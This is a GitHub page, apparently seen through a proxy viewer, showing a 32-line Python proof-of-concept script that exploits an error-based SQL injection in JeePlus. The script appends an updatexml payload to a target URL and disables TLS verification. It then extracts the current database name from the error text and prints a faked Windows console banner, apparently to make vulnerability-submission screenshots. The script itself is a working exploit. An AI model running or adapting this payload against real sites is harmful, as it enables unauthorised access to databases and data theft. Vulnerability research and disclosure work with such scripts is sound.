FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
scripts/jeeplus-sql-injection.py at master · RiftSploit/scripts · GitHub
RiftSploit
/
scripts
Public
forked from
myh0st/scripts
Notifications
You must be signed in to change notification settings
Fork
0
Star
0
Code
Pull requests
0
Actions
Projects
Security and quality
0
Insights
Additional navigation options
Code
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
scripts
/
jeeplus-sql-injection.py
Copy path
More file actions
More file actions
Latest commit
History
History
History
32 lines (26 loc) · 1.01 KB
Breadcrumbs
scripts
/
jeeplus-sql-injection.py
Copy path
File metadata and controls
32 lines (26 loc) · 1.01 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#author: myh0st@xazlsec
import
requests
import
urllib3
import
sys
import
json
import
re
urllib3
.
disable_warnings
()
patt
=
"XPATH syntax error: '~([^']+)~'"
def
verify
(
siteurl
):
burp0_url
=
siteurl
+
"%27and%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1))%23"
burp0_headers
=
{
"User-Agent"
:
"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
}
req
=
requests
.
get
(
burp0_url
,
headers
=
burp0_headers
,
verify
=
False
)
data
=
re
.
findall
(
patt
,
req
.
text
)
if
len
(
data
)
!=
0
:
return
data
[
0
]
return
""
if
__name__
==
"__main__"
:
target
=
sys
.
argv
[
1
]
print
(
"Microsoft Windows [版本 10.0.19044.3086]
\n
(c) Microsoft Corporation。保留所有权利。
\n
\n
D:\VulnSubmit\script>python3 jeeplus-sql-injection.py "
,
target
)
info
=
verify
(
target
)
if
info
!=
""
:
print
(
"[+]漏洞存在,查询当前数据库的名称,结果为:"
,
info
)
else
:
print
(
"[-]漏洞不存在"
)
Back
|
FazBrowse Home
|
New Git URL